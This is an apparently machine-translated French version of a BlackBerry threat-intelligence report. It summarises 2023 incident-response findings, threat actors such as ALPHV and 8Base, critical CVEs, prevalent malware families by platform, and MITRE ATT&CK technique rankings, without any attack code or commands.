Le Premier ministre canadien Justin Trudeau a déclaré : "La cybersécurité est un pilier essentiel de la stratégie indo-pacifique du Canada, qui vise à promouvoir la paix, la sécurité et la coopération dans la région. La cybersécurité est un défi commun qui nécessite une coopération internationale. C'est pourquoi nous soutenons fermement le Centre d'excellence en cybersécurité BlackBerry en Malaisie, un partenaire bilatéral important du Canada. En soutenant les futurs cyberdéfenseurs de la Malaisie et en établissant des réseaux régionaux plus solides pour le partage d'expertise entre le Canada et l'Asie du Sud-Est, nous pouvons renforcer la résilience et la capacité de nos deux pays et de l'ensemble de la région à contrer et à décourager les cybermenaces et à y répondre".
Tout au long de la période couverte par le rapport, les gouvernements et les entreprises ont été constamment rappelés à la vulnérabilité de leurs réseaux. En septembre 2023, il a été révélé que des pirates chinois s'étaient introduits dans la plate-forme de messagerie de Microsoft, dérobant des dizaines de milliers de courriels provenant de comptes du Département d'État américain. Cette révélation faisait suite à des rapports antérieurs faisant état d'attaques similaires contre d'autres cibles du gouvernement américain, notamment le ministère du commerce. Récemment, il a également été révélé que les autorités canadiennes travaillant aux Affaires mondiales du Canada ont subi une "violation prolongée de la sécurité des données".
Comme l'a souligné le Centre canadien de cybersécurité dans sa dernière "Évaluation nationale de la cybermenace", les infrastructures critiques sont de plus en plus menacées par les cybermenaces. Des acteurs parrainés par des États cherchent activement à infiltrer ces systèmes, et des technologies perturbatrices, telles que l'IA, peuvent donner naissance à de nouvelles menaces. Comme indiqué dans le présent rapport, l'Australie a également subi de nombreuses cyberattaques très médiatisées contre ses infrastructures critiques, notamment contre Optus, la deuxième société de télécommunications d'Australie, et Medibank, la plus grande caisse d'assurance maladie privée du pays.
L'industrie n'est pas non plus à l'abri de ces menaces, et de nouvelles réglementations sont apparues en 2023 pour commencer à s'attaquer à ce problème. Par exemple, en décembre 2023, un nouvel ensemble de règles exigeant des entreprises cotées en bourse qu'elles divulguent les cyberincidents "importants" à la Securities and Exchange Commission des États-Unis - dans un délai de quatre jours - est entré en vigueur. En Europe, l'UE a récemment adopté la loi sur la cyber-résilience, qui définit de nouvelles exigences en matière de cybersécurité pour les produits matériels et logiciels comportant des éléments numériques vendus dans l'Union européenne. Cette loi s'ajoute aux mesures supplémentaires exigées par la directive actualisée de l'UE sur la sécurité des réseaux et de l'information, qui vise à remédier aux vulnérabilités des infrastructures critiques en matière de cybersécurité.
Enfin, en novembre 2023, l'Australie a publié sa stratégie de cybersécurité, qui préconise une approche "à l'échelle de la nation" pour protéger les informations critiques, partager les renseignements sur les menaces et promouvoir l'utilisation de produits technologiques sûrs et sécurisés.
Face à l'évolution constante du paysage des menaces, BlackBerry a toujours insisté sur la nécessité de moderniser la sécurité en remplaçant les technologies traditionnelles (telles que les VPN) par des solutions de cybersécurité modernesbasées sur la confiance zéro et pilotées par l'IA, qui évaluent en permanence la posture de sécurité d'un appareil afin de prévenir les cyberattaques avant qu'elles ne se produisent. Les technologies de cybersécurité axées sur la prévention qui utilisent une approche de confiance zéro deviendront de plus en plus critiques à mesure que les acteurs de la menace développeront des moyens plus sophistiqués pour échapper à la sécurité informatique traditionnelle ou patrimoniale.
Au cours de l'année à venir, la menace posée par des cyberattaques de plus en plus sophistiquées devrait s'intensifier. Les responsables des pays démocratiques du monde entier sont particulièrement préoccupés par la mesure dans laquelle les acteurs malveillants utiliseront les techniques numériques pour perturber les processus démocratiques. Alors qu'environ 49 % de la population mondiale de 64 pays se rendra aux urnes en 2024, certains experts commencent à tirer la sonnette d'alarme : les processus et infrastructures électoraux pourraient également être une cible de choix. Jen Easterly, directrice de la CISA du gouvernement américain, a averti que "l'IA générative amplifiera les risques de cybersécurité et rendra plus facile, plus rapide et moins coûteux d'inonder le pays de faux contenus".
Elle a ajouté que "cette technologie étant désormais plus disponible et plus puissante que jamais, son utilisation malveillante est sur le point de mettre à l'épreuve la sécurité du processus électoral des États-Unis en donnant aux acteurs malveillants désireux de saper la démocratie américaine - y compris la Chine, l'Iran et la Russie - la possibilité de renforcer leurs tactiques".
Analyse de la réponse à l'incident et commentaires
La réponse aux incidents (RI) est une approche au niveau de l'entreprise pour faire face aux cyberattaques et aux incidents de cybersécurité. L'objectif de la réponse aux incidents est de contenir et de minimiser les dommages causés par une violation et de réduire le temps et les coûts de rétablissement. BlackBerry® Cybersecurity Services propose des plans de réponse rapide aux incidents afin d'atténuer l'impact de toute cyberattaque et de veiller à ce que la récupération numérique suive les meilleures pratiques. L'équipe IR de BlackBerry propose une approche multidimensionnelle comprenant la réponse aux incidents cybernétiques, la réponse aux violations de données, la réponse à la compromission du courrier électronique professionnel, la réponse aux ransomwares et la criminalistique numérique.
Voici quelques-unes des principales observations de BlackBerrysur les cybermenaces auxquelles nos équipes de RI ont répondu au cours de la période considérée :
BlackBerry Cybersecurity Services a observé plusieurs incidents dans lesquels le vecteur d'infection initial était un système vulnérable orienté vers l'internet, tel que Cisco® Adaptive Security Appliance (ASA), Citrix® NetScaler® et d'autres appareils VPN.
Dans certains cas, ces incidents ont conduit au déploiement d'un ransomware dans l'environnement du client. La technique MITRE la plus souvent utilisée pour déployer un ransomware via un système exposé à Internet est External Remote Services - T1133. Cela souligne la nécessité pour les entreprises d'appliquer les mises à jour de sécurité à tous les systèmes exposés à Internet en temps opportun. Par exemple, les services à distance tels que les VPN, Citrix et autres mécanismes d'accès permettent aux utilisateurs de se connecter aux ressources du réseau interne à partir d'emplacements externes. Il est donc logique que l'application de correctifs à un VPN vulnérable empêche de manière proactive un acteur menaçant de diffuser un ransomware après s'être introduit dans un réseau d'entreprise via le VPN.
BlackBerry a observé des incidents où le vecteur d'infection initial était un système Microsoft® Windows® orienté vers l'internet, permettant un accès à distance sans mise en œuvre d'une authentification multifactorielle (MFA).
Cela souligne la nécessité pour les entreprises de restreindre ou de refuser l'accès à distance aux systèmes qui n'utilisent pas le MFA. En outre, l'équipe IR de BlackBerry a observé un incident où, après avoir obtenu un accès initial, un acteur de la menace a pu accéder au système interne d'un client à l'aide d'un mot de passe par défaut. Cela souligne la nécessité pour les entreprises de mettre en œuvre des contrôles de sécurité d'authentification forts sur tous les systèmes, qu'ils soient orientés vers l'Internet ou internes, et de toujours changer les mots de passe par défaut. (Techniques MITRE External Remote Services - T1133, Valid Accounts - T1078.001, Default Credentials - T0812).
L'équipe IR de BlackBerry a également observé des incidents liés aux logiciels malveillants GootLoader dans lesquels des employés de l'entreprise avaient effectué des recherches sur Internet pour trouver des documents légitimes, mais avaient accidentellement téléchargé des documents infectés par GootLoader, ce qui a entraîné d'autres infections du système au sein du réseau du client. Dans notre précédent rapport sur GootLoader, nous avions noté que "le groupe de menace à l'origine du logiciel malveillant est également connu pour appliquer des techniques d'optimisation des moteurs de recherche (SEO) afin de placer ses pages troyennes en tête et au centre des résultats de recherche du navigateur Internet". Cette technique est connue sous le nom de SEO Poisoning - sous-technique T1608.006 de MITRE.
Cela souligne la nécessité pour les entreprises de restreindre et/ou d'interdire de manière stratégique la navigation sur Internet au sein de l'entreprise, ainsi que de former les employés à des pratiques et habitudes de navigation sécurisées sur Internet.
Les cyber-histoires les plus intéressantes
L'équipe de recherche et de renseignement sur les menaces ( BlackBerry ) étudie les menaces émergentes et persistantes et fournit des analyses de renseignement au profit des défenseurs et des organisations qu'ils servent.
Au cours de cette période, nous avons découvert et analysé une multitude de campagnes menées par des acteurs de menaces nouveaux et émergents. Vous trouverez ci-dessous des résumés de certains de nos derniers rapports.
Vous trouverez les versions intégrales de tous ces rapports et d'autres encore sur le blogBlackBerry .
AeroBlade à l'assaut de l'industrie aérospatiale américaine
À la fin du mois de novembre 2023, BlackBerry a découvert un acteur de la menace jusqu'alors inconnu, ciblant une organisation aérospatiale aux États-Unis, dans le but apparent de mener des activités de cyberespionnage commercial et concurrentiel.
L'équipe de recherche et de renseignement sur les menaces de BlackBerry suit cet acteur de la menace sous le nom d'AeroBlade. L'acteur a utilisé le spearphishing comme mécanisme de diffusion : Un document militarisé (envoyé en pièce jointe d'un courriel) contient une technique d'injection de modèle à distance intégrée et un code macro VBA malveillant, qui permet de passer à l'étape suivante de l'exécution de la charge utile finale.
Les éléments de preuve suggèrent que l'infrastructure réseau et l'armement de l'attaquant sont devenus opérationnels vers septembre 2022, la phase offensive de l'attaque ayant eu lieu en juillet 2023. L'attaquant a amélioré sa panoplie d'outils pendant cette période, la rendant plus furtive, tandis que l'infrastructure du réseau est restée la même.
Compte tenu de la fonctionnalité de la charge utile finale et de l'objet de l'attaque, BlackBerry estime, avec un degré de confiance moyen à élevé, que l'objectif de cette attaque était le cyberespionnage commercial. Son but était très probablement d'obtenir une visibilité sur les ressources internes de sa cible afin d'évaluer sa susceptibilité à une future demande de rançon.
Le BiBi Wiper utilisé lors de la guerre entre Israël et le Hamas fonctionne désormais sous Windows
Dans les derniers jours d'octobre 2023, la société israélienne Security Joes a publié des informations sur un nouveau logiciel malveillant de type "wiper" pour les systèmes Linux®, utilisé par des hacktivistes pour cibler des entreprises israéliennes dans le contexte de la guerre entre Israël et le Hamas. Security Joes suit actuellement ce nouveau logiciel malveillant sous le nom de BiBi-Linux Wiper. Vingt-quatre heures plus tard, l'équipe de recherche et de renseignement de BlackBerry a découvert une variante ciblant les systèmes Windows, que nous avons baptisée BiBi-Windows Wiper.
Après l'attaque terroriste du Hamas contre Israël le 7 octobre, la guerre entre le Hamas et Israël s'est rapidement étendue au domaine cybernétique. Un groupe d'hacktivistes soupçonné d'être affilié au Hamas s'est introduit dans des entreprises israéliennes, compromettant les hôtes faisant face à Internet pour accéder à leurs réseaux, et a déployé une nouvelle cyberarme très spécifique dans une tentative apparente d'endommager l'infrastructure des entreprises. Contrairement à la grande majorité des groupes de menace cités, les groupes d'hacktivistes ne sont pas motivés par des intérêts financiers, mais soutiennent les idéologies politiques associées à la guerre en cours.
Le nouveau logiciel malveillant a été découvert par l'équipe IR de Security Joes, qui fournissait une assistance aux entreprises israéliennes. L'attaque ne comportait pas de demande de rançon ni de serveurs C2, ce qui a conduit les intervenants à supposer que le logiciel malveillant BiBi-Linux était un wiper, déployé dans le seul but de détruire des données.
Après analyse, l'équipe a découvert que le surnom du Premier ministre israélien Benjamin Netanyahu, Bibi, était codé en dur dans le logiciel malveillant et dans l'extension de chaque fichier détruit. Dans son rapport, Security Joes avance l'hypothèse que le wiper a pu être créé "par un groupe de pirates informatiques affiliés au Hamas, dans le but de semer le chaos sur fond de guerre".
La variante Windows détectée par BlackBerry confirme que les hacktivistes présumés qui ont créé le wiper continuent à développer le logiciel malveillant et indique une expansion de l'attaque pour cibler les machines des utilisateurs finaux et les serveurs d'application. En diversifiant les systèmes qu'ils attaquent, les malfaiteurs risquent fort d'endommager d'autres machines Windows. Windows représente actuellement 68 % des utilisateurs d'ordinateurs de bureau dans le monde, contre 2,9 % pour Linux.
Alors que la guerre entre Israël et le Hamas se prolonge jusqu'en 2024, il semble qu'il n'y ait plus de havres de paix, que ce soit dans le domaine physique ou numérique. Les wipers sont généralement utilisés lors d'attaques déclenchées par des événements géopolitiques, car leur objectif est la destruction, purement et simplement.
Au fur et à mesure que le conflit se poursuit, il est probable que ce type d'attaques se multipliera.
Le FBI et le DOJ ont démantelé Qakbot, le "couteau suisse" des logiciels malveillants
Dans les derniers jours du mois d'août 2023, le ministère américain de la justice (DoJ) et le FBI ont lancé leur opération conjointe de démantèlement de Qakbot, l'une des familles de logiciels malveillants et l'un des réseaux de zombies les plus anciens, ce qui a eu des répercussions sur les services répressifs et les communautés de la cybercriminalité dans le monde entier.
Sous le nom de code "Operation Duck Hunt", cette opération internationale coordonnée a permis aux autorités de prendre le contrôle de l'infrastructure en ligne de Qakbot. Le groupe de travail a ensuite obtenu des ordonnances judiciaires pour supprimer à distance le logiciel malveillant des appareils infectés, qui comptaient à l'époque quelque 700 000 machines dans le monde, dont 200 000 ordinateurs aux États-Unis.
L'opération multinationale visant à perturber le réseau de zombies a impliqué des actions aux États-Unis, en France, en Allemagne, aux Pays-Bas, au Royaume-Uni, en Roumanie et en Lettonie. Le DoJ a également annoncé la saisie de plus de 8,6 millions de dollars de profits illicites en crypto-monnaies.
"Il s'agit de l'opération technologique et financière la plus importante jamais menée par le ministère de la justice contre un réseau de zombies", a déclaré Martin Estrada, procureur du district sud de la Californie, lors d'une conférence de presse à Los Angeles.
Qakbot a été impliqué dans 40 attaques de ransomware au cours des 18 derniers mois, qui ont collectivement coûté aux victimes plus de 58 millions de dollars de pertes. L'équipe de recherche et de renseignement sur les menaces ( BlackBerry ) a identifié Qakbot comme l'un des chevaux de Troie les plus fréquemment utilisés contre les organismes de santé au cours du dernier trimestre 2022, mais d'autres secteurs ont également souffert des attaques de Qakbot. En fait, presque tous les secteurs de l'économie ont été victimes de Qakbot à ce jour.
Si l'opération Duck Hunt a posé de nouveaux jalons dans la lutte contre les cybermenaces à grande échelle, les experts en cybersécurité préviennent que les revers subis par les acteurs de la cybercriminalité ne seront probablement que temporaires. Aucune arrestation n'a été effectuée dans le cadre de cette opération, et les autorités n'ont pas révélé où les opérateurs de logiciels malveillants sont censés se trouver, bien que la Russie ait été mise en cause.
L'enquête est actuellement qualifiée de "en cours".
Acteurs de la menace
CABINE OR (TA551)
Agissant en tant que courtier d'accès initial (IAB), le service de distribution du groupe a été utilisé comme intermédiaire pour la distribution de familles de logiciels malveillants connues comme Ursnif, IcedID, ZLoader et comme fournisseur MaaS pour QakBot (alias QBot) à partir de 2021.
GOLD CABIN privilégie souvent les charges utiles initiales de documents Microsoft® Word infectés dans des archives ZIP cryptées avec un mot de passe fourni par un courriel d'hameçonnage. Cela permet de contourner les services initiaux de protection du courrier électronique. Ces documents contiennent des macro-commandes et des instructions permettant d'accéder au protocole HTTP pour récupérer une charge utile malveillante.
ALPHV (Chat noir)
Outre le ransomware BlackCat lui-même, ALPHV utilisera PowerShell pour désactiver les fonctions de Windows Defender, PsExec contre les comptes Active Directory, CobaltStrike pour les mouvements latéraux et ExMatter pour l'exfiltration de données et pour supprimer les copies d'ombre du fichier cible afin d'empêcher la récupération des données.
Les campagnes BlackCat se sont poursuivies au cours du trimestre, affectant les gouvernements des États américains, les entreprises de soins de santé, les casinos et bien d'autres encore. En décembre 2023, le FBI et la CISA ont publié un avis conjoint sur la cybersécurité qui estime que les affiliés d'ALPHV ont utilisé le ransomware BlackCat pour compromettre plus de 1 000 entités, encaissant environ 300 millions de dollars en paiements de rançons.
Au début du mois de mars 2024, l'infrastructure d'ALPHV était hors service, suite à une attaque par rançongiciel apparemment réussie contre Change Healthcare, un fournisseur de gestion du cycle des revenus et des paiements qui traite 15 milliards de transactions de soins de santé par an au sein du système de soins de santé américain. L'attaque par ransomware a été l'une des plus perturbatrices de ces dernières années, déclenchant une panne dont les effets sur les pharmacies, les hôpitaux et les patients se sont étendus sur plus d'une semaine.
Bien que les rapports indiquent que le groupe a "blâmé les autorités fédérales" pour le démantèlement de l'infrastructure, il est possible que les dirigeants du groupe aient intentionnellement mis les choses hors ligne. Certains experts pensent qu'il s'agit d'une querelle interne ou d'une escroquerie de sortie, les opérateurs du groupe de menace s'emparant des bénéfices et abandonnant les affiliés de niveau inférieur. D'autres pensent que le groupe est en train de changer de marque et qu'il va reprendre ses activités pour tenter d'échapper aux forces de l'ordre.
Cette nouvelle est le dernier exemple en date d'une tendance inquiétante qui voit les groupes de ransomware cibler de plus en plus le secteur de la santé. Le ministère américain de la santé et des services sociaux (HSS) note que cet incident "rappelle l'interconnexion de l'écosystème national des soins de santé et l'urgence de renforcer la résilience en matière de cybersécurité dans l'ensemble de l'écosystème".
8Base
8Base a été principalement active en Amérique du Nord et en Amérique latine, avec un pic d'activité massif à la mi-2023. Elle cible principalement les petites et moyennes entreprises dans un nombre croissant de secteurs. Plus particulièrement, 8Base, ainsi que Clop et LockBit, ont été à l'origine de 48 % de toutes les cyberattaques enregistrées au cours du seul mois de juillet 2023.
En octobre 2023, 8Base a été observé en train de cibler un établissement de santé basé aux États-Unis, mettant ainsi en évidence la menace potentielle qu'il représente pour le secteur des soins de santé et de la santé publique (HPH). Lors de ses attaques, 8Base utilise des binaires et des scripts "living-off-the-land" (LOLBAS) avant de déployer son ransomware. Bien qu'ils se décrivent sur leur site de fuite comme des "pentesters honnêtes et simples", le nombre croissant de victimes et les tactiques agressives du groupe brossent un tableau plus complexe. Il convient de noter qu'aucun pays de l'ex-Union soviétique ou de la Communauté des États indépendants (CEI) n'a encore été ciblé par le groupe, une exclusion géographique qui est souvent la marque de fabrique de nombreux acteurs de menaces russophones.
Outils
Mimikatz
Cadre Metasploit
Grève du cobalt
CVEs : Impact et statistiques
Le système CVE (Common Vulnerabilities and Exposures), géré par The MITRE Corporation, est un catalogue d'informations sur les vulnérabilités et les expositions connues du public. Le système CVE est parrainé par le ministère américain de la sécurité intérieure (DHS) et la CISA.
Au cours de cette période, de nouvelles vulnérabilités ont été découvertes dans les produits Cisco®, Apache®, Citrix® et JetBrains®. Des méthodes d'atténuation de ces vulnérabilités ont déjà été publiées, mais certains acteurs de la menace ont encore profité pleinement des systèmes non corrigés.
CVE en vogue
Vulnérabilités de Cisco ASA et FTD
CVE-2023-20269 (9.1 CRITIQUE)
Accès non autorisé
L'ASA et le FTD de Cisco présentent tous deux une vulnérabilité dans la fonction VPN qui permet aux acteurs de la menace de mener des attaques par force brute contre les comptes existants. Cette vulnérabilité aurait été exploitée par les groupes de ransomware LockBit et Akira.
Vulnérabilité de WinRAR
CVE-2023-38831 (7.8 HAUT)
Exécution de code arbitraire
Une vulnérabilité dans RARLAB WinRAR avant la version 6.23 permet aux attaquants d'exécuter un code arbitraire lors de l'affichage de fichiers dans une archive .ZIP. Cette vulnérabilité aurait été exploitée par divers groupes de menace, y compris ceux soutenus par les gouvernements, qui ont déployé un large éventail de logiciels malveillants.
Vulnérabilité de JetBrains TeamCity
CVE-2023-42793 (9.8 CRITIQUE)
Contournement de l'authentification
Un contournement de l'authentification conduisant à un RCE sur TeamCity Server. Ce CVE a été signalé comme étant exploité par plusieurs acteurs de menaces nord-coréens. En septembre, il a été observé qu'il était utilisé par le groupe de menace russe APT29, selon cet avis de la CISA.
Vulnérabilité de l'utilitaire de configuration F5 BIG-IP
CVE-2023-46747 (9.8 CRITIQUE)
Exécution de code à distance
Vulnérabilité permettant à un attaquant disposant d'un accès réseau au système BIG-IP d'exécuter des commandes système arbitraires. Le bulletin de sécurité de F5 indique qu'il a observé des acteurs de la menace utilisant cette vulnérabilité.
Journée zéro de SysAid
CVE-2023-47246 (9.8 CRITIQUE)
Exécution de code non autorisé
IT Service Management (ITSM) avec une vulnérabilité de traversée de chemin qui conduit à une exécution de code après qu'un attaquant ait réussi à écrire un fichier dans le Tomcat Webroot(88). L'exploitation de cet exploit dans le cadre d'une journée zéro permet de déployer le ransomware Clop.
Citrix Bleed
CVE-2023-4966 (9.4 CRITIQUE)
Débordement de mémoire tampon
Affecte Citrix NetScaler ADC et NetScaler Gateway. Contient une vulnérabilité de débordement de mémoire tampon qui permet la divulgation d'informations sensibles lorsqu'il est configuré en tant que passerelle. LockBit a exploité la vulnérabilité Citrix Bleed au cours de la période couverte par ce rapport.
Vulnérabilité d'Apache OFBiz 18.12.09
CVE-2023-49070 (9.8 CRITIQUE) ; CVE-2023-51467 (9.8 CRITIQUE)
Exécution de code à distance
RCE préauth dans Apache OFBiz 18.12.09. La correction initiale de CVE-2023-49070 a conduit à la découverte d'une nouvelle CVE -- CVE-2023-51467 dans Apache OFBiz. La seconde vulnérabilité permettait aux attaquants de contourner le processus de connexion et d'exécuter du code arbitraire à distance.
Statistiques
Menaces prévalentes : Windows
Remcos
Trojan d'accès à distance
Remcos est un logiciel utilisé pour accéder à distance à l'appareil d'une victime. Il a été de plus en plus utilisé lors de l'invasion de l'Ukraine par la Russie.
Agent Tesla
Voleur d'informations
L'agent Tesla est un logiciel malveillant .NET utilisé principalement pour recueillir des informations d'identification.
RedLine
Voleur d'informations
RedLine est utilisé pour voler des identifiants sauvegardés, des données de saisie automatique, des informations sur les cartes de crédit et d'autres données précieuses.
Emotet
Téléchargeur
Emotet continue d'évoluer et est aujourd'hui principalement utilisé en tant qu'infrastructure et fournisseur de contenu en tant que service.
RisePro
Voleur d'informations
RisePro a fait l'objet d'une mise à jour récente au cours de la période couverte par le présent rapport.
PrivateLoader
Téléchargeur
PrivateLoader est un logiciel malveillant modulaire utilisé pour télécharger et exécuter des charges utiles.
LummaStealer
Voleur d'informations
LummaStealer utilise un modèle MaaS et cible principalement les portefeuilles de crypto-monnaies et les extensions de navigateur à authentification à deux facteurs.
Raton laveur/RecordBreaker
Voleur d'informations
Après une interruption au début de l'année 2023, les développeurs de Raccoon sont revenus au second semestre de l'année dernière avec une nouvelle version.
SystèmeBC
Proxy Bot
SystemBC est utilisé pour mettre en place un proxy SOCKS5 vers son C2.
DanaBot
Voleur d'informations
DanaBot se concentre sur le vol d'informations. Cependant, comme il est modulaire, il peut être utilisé à d'autres fins, comme le téléchargement et l'exécution d'autres charges utiles. Il a été mis à jour avec une nouvelle version au cours du second semestre 2023.
Menaces prévalentes : Linux
NoaBot/Mirai
Déni de service distribué (DDoS)
NoaBot est une nouvelle variante du botnet Mirai. Contrairement aux itérations précédentes de Mirai, NoaBot utilise SSH plutôt que Telnet pour diffuser son malware. Dans certains cas, NoaBot a également été vu en train de déployer une version modifiée du mineur XMRig.
XMRig Miner
Cryptocurrency Miner
La deuxième menace la plus observée sur les serveurs Linux dans notre télémétrie au cours de cette période de rapport était les mineurs XMRig ciblant Monero. Ils permettent à un acteur de la menace d'utiliser le système d'une victime pour miner de la crypto-monnaie à son insu.
Looney Toonables
Exploiter
Bien qu'elle ne soit pas présente dans notre propre télémétrie, une menace Linux notable au cours de ce trimestre a été l'amusante Looney Toonables, également connue sous le nom de CVE-2023-4911. Il s'agit d'un débordement de mémoire tampon dans le chargeur dynamique ld.so de la bibliothèque GNU C qui permet à des attaquants locaux d'obtenir les privilèges de l'administrateur.
Menaces prévalentes : MacOS
Voleur atomique
Voleur d'informations
Le vecteur d'infection est une fausse publicité qui incite l'utilisateur à télécharger une fausse application. Atomic Stealer cible les mots de passe, les cookies du navigateur et les données de remplissage automatique, les portefeuilles de cryptomonnaie et les données du trousseau de clés Mac®.
XLoader
Voleur d'informations
La diffusion initiale du logiciel malveillant se fait par l'intermédiaire d'une application Microsoft Office transformée en cheval de Troie. XLoader capture des informations sur le navigateur et le presse-papiers qui peuvent être utilisées pour compromettre davantage la cible.
RustBucket
Voleur d'informations
Une charge utile initiale peut être livrée par le biais d'un courriel d'hameçonnage. Elle comporte des fonctionnalités C2, mais l'objectif principal du logiciel malveillant est de voler des crypto-actifs.
JaskaGO
Voleur d'informations
Construite et compilée dans le langage de programmation open-source Go, cette souche de malware peut cibler les systèmes d'exploitation Windows et Mac. JaskaGO dispose d'une fonctionnalité C2 et peut exfiltrer les données du navigateur, les crypto-actifs et les fichiers de l'appareil infecté.
Menaces prévalentes : Android
SpyNote
Cheval de Troie Infostealer/Remote Access
Utilise Android™ Accessibility Service pour capturer les données de l'utilisateur et les envoyer à un serveur C2.
Caméléon
Cheval de Troie bancaire
Une nouvelle variante de Chameleon est distribuée via la plateforme du dark net Zombinder. Elle exploite les services d'accessibilité d'Android pour collecter des informations sur les utilisateurs. Cette nouvelle version inclut une fonctionnalité permettant de contourner les lecteurs biométriques et d'afficher une page HTML guidant l'utilisateur pour activer les services d'accessibilité.
FjordPhantom
Cheval de Troie bancaire
FjordPhantom utilise des conteneurs virtuels par le biais de solutions de virtualisation intégrées pour envelopper des applications bancaires. Cela permet à l'attaquant d'usurper l'identité d'une application bancaire légitime en utilisant massivement des cadres d'accroche.
Tempête interplanétaire/IPStorm
Infostealer/Botnet
Nouvelle variante Go d'IPStorm qui utilise la force brute SSH pour se propager. Il ouvre également des serveurs Android Debug Bridge. Le réseau p2p IPFS est utilisé pour la communication entre les nœuds.
Techniques courantes de MITRE
Comprendre les techniques de haut niveau des groupes de menace peut aider à décider des techniques de détection à privilégier. BlackBerry a observé les 20 techniques MITRE les plus utilisées par les acteurs de la menace au cours de la période couverte par le présent rapport.
Une flèche vers le haut dans la dernière colonne indique que l'utilisation de la technique a augmenté depuis notre dernier rapport. Une flèche vers le bas indique que l'utilisation a diminué depuis notre dernier rapport. Un symbole égal (=) signifie que la technique reste dans la même position que dans notre dernier rapport.
Nom de la technique | ID de la technique | Tactique | Dernier rapport | Changer |
---|---|---|---|---|
Processus d'injection
|
T1055
|
L'escalade des privilèges
|
NA
|
↑
|
Capture d'entrée
|
T1056
|
Collection
|
NA
|
↑
|
Découverte d'informations sur le système
|
T1082
|
Découverte
|
3
|
↓
|
Chargement latéral de DLL
|
T1574.002
|
Persistance
|
12
|
↑
|
Protocole de la couche non applicative
|
T1095
|
Commande et contrôle
|
14
|
↑
|
Protocole de la couche application
|
T1071
|
Commande et contrôle
|
10
|
↑
|
Interprète de commandes et de scripts
|
T1059
|
Exécution
|
9
|
↑
|
Tâche/travail programmé(e)
|
T1053
|
L'escalade des privilèges
|
NA
|
↑
|
Clés d'exécution du registre/dossier de démarrage
|
T1547.001
|
Persistance
|
NA
|
↑
|
Mascarade
|
T1036
|
Évasion de la défense
|
6
|
↓
|
Réplication sur support amovible
|
T1091
|
Mouvement latéral
|
NA
|
↑
|
Service Windows
|
T1543.003
|
Persistance
|
NA
|
↑
|
Découverte de fichiers et de répertoires
|
T1083
|
Découverte
|
11
|
↓
|
Instrumentation de gestion de Windows
|
T1047
|
Exécution
|
19
|
↑
|
Découverte du système à distance
|
T1018
|
Découverte
|
5
|
↓
|
Virtualisation/
Évasion du bac à sable |
T1497
|
Évasion de la défense
|
3
|
↓
|
Altération du contenu partagé
|
T1080
|
Mouvement latéral
|
NA
|
↑
|
Désactiver ou modifier des outils
|
T1562.001
|
Évasion de la défense
|
7
|
↓
|
Découverte du processus
|
T1057
|
Découverte
|
4
|
↓
|
Des données cryptées pour plus d'impact
|
T1486
|
Impact
|
NA
|
↑
|
ID de la technique | |
---|---|
Processus d'injection |
T1055
|
Capture d'entrée |
T1056
|
Découverte d'informations sur le système |
T1082
|
Chargement latéral de DLL |
T1574.002
|
Protocole de la couche non applicative |
T1095
|
Protocole de la couche application |
T1071
|
Interprète de commandes et de scripts |
T1059
|
Tâche/travail programmé(e) |
T1053
|
Clés d'exécution du registre/dossier de démarrage |
T1547.001
|
Mascarade |
T1036
|
Réplication sur support amovible |
T1091
|
Service Windows |
T1543.003
|
Découverte de fichiers et de répertoires |
T1083
|
Instrumentation de gestion de Windows |
T1047
|
Découverte du système à distance |
T1018
|
Virtualisation/ Évasion du bac à sable |
T1497
|
Altération du contenu partagé |
T1080
|
Désactiver ou modifier des outils |
T1562.001
|
Découverte du processus |
T1057
|
Des données cryptées pour plus d'impact |
T1486
|
Tactique | |
---|---|
Processus d'injection |
L'escalade des privilèges
|
Capture d'entrée |
Collection
|
Découverte d'informations sur le système |
Découverte
|
Chargement latéral de DLL |
Persistance
|
Protocole de la couche non applicative |
Commande et contrôle
|
Protocole de la couche application |
Commande et contrôle
|
Interprète de commandes et de scripts |
Exécution
|
Tâche/travail programmé(e) |
L'escalade des privilèges
|
Clés d'exécution du registre/dossier de démarrage |
Persistance
|
Mascarade |
Évasion de la défense
|
Réplication sur support amovible |
Mouvement latéral
|
Service Windows |
Persistance
|
Découverte de fichiers et de répertoires |
Découverte
|
Instrumentation de gestion de Windows |
Exécution
|
Découverte du système à distance |
Découverte
|
Virtualisation/ Évasion du bac à sable |
Évasion de la défense
|
Altération du contenu partagé |
Mouvement latéral
|
Désactiver ou modifier des outils |
Évasion de la défense
|
Découverte du processus |
Découverte
|
Des données cryptées pour plus d'impact |
Impact
|
Dernier rapport | |
---|---|
Processus d'injection |
NA
|
Capture d'entrée |
NA
|
Découverte d'informations sur le système |
3
|
Chargement latéral de DLL |
12
|
Protocole de la couche non applicative |
14
|
Protocole de la couche application |
10
|
Interprète de commandes et de scripts |
9
|
Tâche/travail programmé(e) |
NA
|
Clés d'exécution du registre/dossier de démarrage |
NA
|
Mascarade |
6
|
Réplication sur support amovible |
NA
|
Service Windows |
NA
|
Découverte de fichiers et de répertoires |
11
|
Instrumentation de gestion de Windows |
19
|
Découverte du système à distance |
5
|
Virtualisation/ Évasion du bac à sable |
3
|
Altération du contenu partagé |
NA
|
Désactiver ou modifier des outils |
7
|
Découverte du processus |
4
|
Des données cryptées pour plus d'impact |
NA
|
Changer | |
---|---|
Processus d'injection |
↑
|
Capture d'entrée |
↑
|
Découverte d'informations sur le système |
↓
|
Chargement latéral de DLL |
↑
|
Protocole de la couche non applicative |
↑
|
Protocole de la couche application |
↑
|
Interprète de commandes et de scripts |
↑
|
Tâche/travail programmé(e) |
↑
|
Clés d'exécution du registre/dossier de démarrage |
↑
|
Mascarade |
↓
|
Réplication sur support amovible |
↑
|
Service Windows |
↑
|
Découverte de fichiers et de répertoires |
↓
|
Instrumentation de gestion de Windows |
↑
|
Découverte du système à distance |
↓
|
Virtualisation/ Évasion du bac à sable |
↓
|
Altération du contenu partagé |
↑
|
Désactiver ou modifier des outils |
↓
|
Découverte du processus |
↓
|
Des données cryptées pour plus d'impact |
↑
|
À l'aide de MITRE D3FEND, l'équipe de recherche et de renseignement sur les menaces de BlackBerry a dressé une liste complète de contre-mesures pour les techniques observées au cours de la période couverte par le présent rapport, qui est disponible sur notre GitHub public.
Les trois premières techniques sont bien connues et sont utilisées par les adversaires pour recueillir des informations clés afin de mener des attaques réussies. La section "Contre-mesures appliquées" présente quelques exemples de leur utilisation et des informations utiles à surveiller.
L'impact des techniques et tactiques est illustré dans le graphique ci-dessous :
Contre-mesures appliquées
L'injection de processus est une technique d'évasion défensive couramment exploitée qui se produit lorsqu'un code malveillant est placé dans l'espace d'adressage d'un autre processus en cours d'exécution.
